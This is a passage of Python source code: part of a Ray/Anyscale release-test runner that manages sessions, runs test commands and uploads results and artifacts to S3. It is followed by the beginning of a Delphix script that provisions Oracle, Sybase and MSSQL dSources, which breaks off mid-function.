if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found sessions {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
session_token = result.metadata.next_paging_token
if not session_token:
return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
if not completed:
return cmd.id, None
return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
commit_url: str,
session_name: str = None,
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
app_config_id_override: Optional[str] = None,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
# Todo (mid-term): Support other cluster definitions
# (not only cluster configs)
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
if not session_name:
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
build_id_override = None
if test_config["run"].get("use_connect"):
autosuspend_mins = test_config["run"].get("autosuspend_mins", 5)
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
if app_config_id_override is not None:
logger.info(
"Using connect and an app config override, waiting until "
"build finishes so we can fetch the app config in order to "
"install its pip packages locally.")
build_id_override = wait_for_build_or_raise(
sdk, app_config_id_override)
response = sdk.get_cluster_environment_build(build_id_override)
app_config = response.result.config_json
install_app_config_packages(app_config)
install_matching_ray()
elif "autosuspend_mins" in test_config["run"]:
raise ValueError(
"'autosuspend_mins' is only supported if 'use_connect' is True.")
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None,
runtime: int = None,
commit_url: str = None,
session_url: str = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
# Add these metadata here to avoid changing SQL schema.
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
results = get_local_json_content(local_file=results_json, )
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
# These values will be set as the test runs.
session_url = None
runtime = None
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_id = app_config_id_override
app_config_name = None
build_id = build_id_override
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = (
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"], )
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
if app_config_id is None:
(
app_config_id,
app_config_name,
) = create_or_find_app_config(sdk, project_id,
app_config)
else:
logger.info(
f"Using override app config {app_config_id}")
app_config_name = sdk.get_app_config(
app_config_id).result.name
if build_id is None:
# We might have already retrieved the build ID when
# installing app config packages locally if using
# connect, so only get the build ID if it's not set.
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
if not test_config["run"].get("use_connect"):
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
if test_config["run"].get("use_connect"):
assert compute_tpl_name, "Compute template must exist."
assert app_config_name, "Cluster environment must exist."
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
# Build completed, use job timeout
result_queue.put(State("CMD_RUN", time.time(), None))
returncode, logs = run_job(
cluster_name=test_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars,
autosuspend=autosuspend_mins)
_process_finished_client_command(returncode, logs)
return
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
session_id=session_id)
_check_stop(stop_event, "file_sync")
# Optionally run preparation command
prepare_command = test_config["run"].get("prepare")
if prepare_command:
logger.info(f"Running preparation command: {prepare_command}")
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
_, _ = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_PREPARE")
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN")
if not kick_off_only:
_, runtime = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_RUN")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
runtime=runtime,
session_url=session_url,
commit_url=commit_url)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = logs + "; Command logs:" + get_command_logs(
session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
timeout_type = ""
runtime = None
if isinstance(e, CommandTimeoutError):
timeout_type = "timeout"
runtime = 0
elif (isinstance(e, PrepareCommandTimeoutError)
or isinstance(e, FileSyncTimeoutError)
or isinstance(e, SessionTimeoutError)
or isinstance(e, PrepareCommandRuntimeError)):
timeout_type = "infra_timeout"
runtime = None
elif isinstance(e, RuntimeError):
timeout_type = "runtime_error"
runtime = 0
else:
timeout_type = "unknown timeout"
runtime = None
# Add these metadata here to avoid changing SQL schema.
results = {}
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END", time.time(), {
"status": timeout_type,
"last_logs": logs,
"results": results
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
while time.time(
) < start_terminate + 120 and process.is_alive():
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
log_results_and_artifacts(result)
shutil.rmtree(temp_dir)
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
commit_url: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress=False,
report=True,
session_name=None,
app_config_id_override=None):
with open(test_config_file, "rt") as f:
test_configs = yaml.load(f, Loader=yaml.FullLoader)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
logger.error(
"Saving artifacts are not yet supported when running with "
"Anyscale connect.")
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
commit_url,
session_name=session_name,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report,
app_config_id_override=app_config_id_override)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its process.")
return
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--no-report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--session-name",
required=False,
type=str,
help="Name of the session to run this test.")
parser.add_argument(
"--app-config-id-override",
required=False,
type=str,
help=("An app config ID, which will override the test config app "
"config."))
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
maybe_fetch_api_token()
if args.ray_wheels:
os.environ["RAY_WHEELS"] = str(args.ray_wheels)
url = str(args.ray_wheels)
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
commit_url=url,
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=not args.no_report,
session_name=args.session_name,
app_config_id_override=args.app_config_id_override,
)
|
dx_provision_dsource.py | #!/usr/bin/env python
# Corey Brune - Feb 2017
# Description:
# Create and sync a dSource
#
# Requirements
# pip install docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
"""Create and sync a dSource
Usage:
dx_provision_dsource.py (--type <name>)
dx_provision_dsource.py --type <name> --dsource_name <name> --ip_addr <name> --db_name <name> --env_name <name> --db_install_path <name> --dx_group <name> --db_passwd <name> --db_user <name> [--port_num <name>][--num_connections <name>][--link_now <name>][--files_per_set <name>][--rman_channels <name>]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_provision_dsource.py --type <name> --dsource_name <name> --ase_user <name> --ase_passwd <name> --backup_path <name> --source_user <name> --stage_user aseadmin --stage_repo ASE1570_S2 --src_config <name> --env_name <name> --dx_group <name> [--bck_file <name>][--create_bckup]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_provision_dsource.py --type <name> --dsource_name <name> --dx_group <name> --db_passwd <name> --db_user <name> --stage_instance <name> --stage_env <name> --backup_path <name> [--backup_loc_passwd <passwd> --backup_loc_user <name> --logsync [--sync_mode <mode>] --load_from_backup]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_provision_dsource.py -h | --help | -v | --version
Create and sync a dSource
Examples:
Oracle:
dx_provision_dsource.py --type oracle --dsource_name oradb1 --ip_addr 192.168.166.11 --db_name srcDB1 --env_name SourceEnv --db_install_path /u01/app/oracle/product/11.2.0.4/dbhome_1 --db_user delphixdb --db_passwd delphixdb
Sybase:
dx_provision_dsource.py --type sybase --dsource_name dbw1 --ase_user sa --ase_passwd sybase --backup_path /data/db --source_user aseadmin --stage_user aseadmin --stage_repo ASE1570_S2 --src_config dbw1 --env_name aseSource --dx_group Sources
Specify backup files:
dx_provision_dsource.py --type sybase --dsource_name dbw2 --ase_user sa --ase_passwd sybase --backup_path /data/db --source_user aseadmin --stage_user aseadmin --stage_repo ASE1570_S2 --src_config dbw2 --env_name aseSource --dx_group Sources --bck_file "dbw2data.dat"
Create a new backup and ingest:
dx_provision_dsource.py --type sybase --dsource_name dbw2 --ase_user sa --ase_passwd sybase --backup_path /data/db --source_user aseadmin --stage_user aseadmin --stage_repo ASE1570_S2 --src_config dbw2 --env_name aseSource --dx_group Sources --create_bckup
MSSQL:
dx_provision_dsource.py --type mssql --dsource_name mssql_dsource --dx_group Sources --db_passwd delphix --db_user sa --stage_env mssql_target_svr --stage_instance MSSQLSERVER --backup_path \\bckserver\path\backups --backup_loc_passwd delphix --backup_loc_user delphix
dx_provision_dsource.py --type mssql --dsource_name AdventureWorks2014 --dx_group "9 - Sources" --db_passwd delphixdb --db_user aw --stage_env WINDOWSTARGET --stage_instance MSSQLSERVER --logsync --backup_path auto --load_from_backup
Options:
--type <name> dSource type. mssql, sybase or oracle
--ip_addr <name> IP Address of the dSource
--db_name <name> Name of the dSource DB
--env_name <name> Name of the environment where the dSource installed
--db_install_path <name> Location of the installation path of the DB.
--num_connections <name> Number of connections for Oracle RMAN
[default: 5]
--link_now <name> Link the dSource
[default: True]
--files_per_set <name> Configures how many files per set for Oracle RMAN
[default: 5]
--rman_channels <name> Configures the number of Oracle RMAN Channels
[default: 2]
--dx_group <name> Group where the dSource will reside
--create_bckup Create and ingest a new Sybase backup
--db_user <name> Username of the dSource DB
--db_passwd <name> Password of the db_user
--bck_file <name> Fully qualified name of backup file
--port_num <name> Port number of the listener. Default: 1521
--src_config <name> Name of the configuration environment
--ase_passwd <name> ASE DB password
--ase_user <name> ASE username
--backup_path <path> Path to the ASE/MSSQL backups
--sync_mode <name> MSSQL validated sync mode
[TRANSACTION_LOG|FULL_OR_DIFFERENTIAL|FULL|NONE]
--source_user <name> Environment username
--stage_user <name> Stage username
--stage_repo <name> Stage repository
--stage_instance <name> Name of the PPT instance
--stage_env <name> Name of the PPT server
--logsync Enable logsync
--backup_loc_passwd <passwd> Password of the shared backup path (--bckup_path)
--backup_loc_user <nam> User of the shared backup path (--bckup_path)
--load_from_backup If set, Delphix will try to load the most recent full backup (MSSQL only)
--dsource_name <name> Name of the dSource
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_provision_dsource.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
VERSION = "v.0.2.0018"
import sys
from os.path import basename
from time import sleep
from time import time
from docopt import DocoptExit
from docopt import docopt
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import group
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import repository
from delphixpy.v1_8_0.web import sourceconfig
from delphixpy.v1_8_0.web.vo import ASELatestBackupSyncParameters
from delphixpy.v1_8_0.web.vo import ASELinkData
from delphixpy.v1_8_0.web.vo import ASENewBackupSyncParameters
from delphixpy.v1_8_0.web.vo import ASESpecificBackupSyncParameters
from delphixpy.v1_8_0.web.vo import LinkParameters
from delphixpy.v1_8_0.web.vo import MSSqlLinkData
from delphixpy.v1_8_0.web.vo import OracleInstance
from delphixpy.v1_8_0.web.vo import OracleLinkData
from delphixpy.v1_8_0.web.vo import OracleSIConfig
from delphixpy.v1_8_0.web.vo import OracleSourcingPolicy
from delphixpy.v1_8_0.web.vo import SourcingPolicy
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
from lib.DxLogging import print_info
from lib.GetReferences import find_dbrepo
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import get_running_job
from lib.GetSession import GetSession
def create_ora_sourceconfig(engine_name, port_num=1521):
"""
:param ip_addr:
:param db_name:
:return:
"""
create_ret = None
env_obj = find_obj_by_name(
dx_session_obj.server_session, environment, arguments["--env_name"]
)
try:
sourceconfig_ref = find_obj_by_name(
dx_session_obj.server_session, sourceconfig, arguments["--db_name"]
).reference
except DlpxException:
sourceconfig_ref = None
repo_ref = find_dbrepo(
dx_session_obj.server_session,
"OracleInstall",
env_obj.reference,
arguments["--db_install_path"],
).reference
dsource_params = OracleSIConfig()
connect_str = (
"jdbc:oracle:thin:@"
+ arguments["--ip_addr"]
+ ":"
+ str(port_num)
+ ":"
+ arguments["--db_name"]
)
dsource_params.database_name = arguments["--db_name"]
dsource_params.unique_name = arguments["--db_name"]
dsource_params.repository = repo_ref
dsource_params.instance = OracleInstance()
dsource_params.instance.instance_name = arguments["--db_name"]
dsource_params.instance.instance_number = 1
dsource_params.services = [
{"type": "OracleService", "jdbcConnectionString": connect_str}
]
try:
if sourceconfig_ref is None:
create_ret = link_ora_dsource(
sourceconfig.create(dx_session_obj.server_session, dsource_params),
env_obj.primary_user,
)
elif sourceconfig_ref is not None:
create_ret = link_ora_dsource(sourceconfig_ref, env_obj.primary_user)
print_info(
"Created and linked the dSource {} with reference {}.\n".format(
arguments["--db_name"], create_ret
)
)
link_job_ref = dx_session_obj.server_session.last_job
link_job_obj = job.get(dx_session_obj.server_session, link_job_ref)
while link_job_obj.job_state not in ["CANCELED", "COMPLETED", "FAILED"]:
print_info(
"Waiting three seconds for link job to complete, and sync to begin"
)
sleep(3)
link_job_obj = job.get(dx_session_obj.server_session, link_job_ref)
# Add the snapsync job to the jobs dictionary
dx_session_obj.jobs[engine_name + "snap"] = get_running_job(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, database, arguments["--dsource_name"]
).reference,
)
print_debug(
"Snapshot Job Reference: {}.\n".format(
dx_session_obj.jobs[engine_name + "snap"]
)
)
except (HttpError, RequestError) as e:
print_exception("ERROR: Could not create the sourceconfig:\n" "{}".format(e))
sys.exit(1)
def link_ora_dsource(srcconfig_ref, primary_user_ref):
"""
:param srcconfig_ref: Reference to the sourceconfig object
:param primary_user_ref: Reference to the environment user
:return: Reference of the linked dSource
"""
link_params = LinkParameters()
link_params.link_data = OracleLinkData()
link_params.link_data.sourcing_policy = OracleSourcingPolicy()
link_params.name = arguments["--dsource_name"]
link_params.group = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--dx_group"]
).reference
link_params.link_data.compressedLinkingEnabled = True
link_params.link_data.environment_user = primary_user_ref
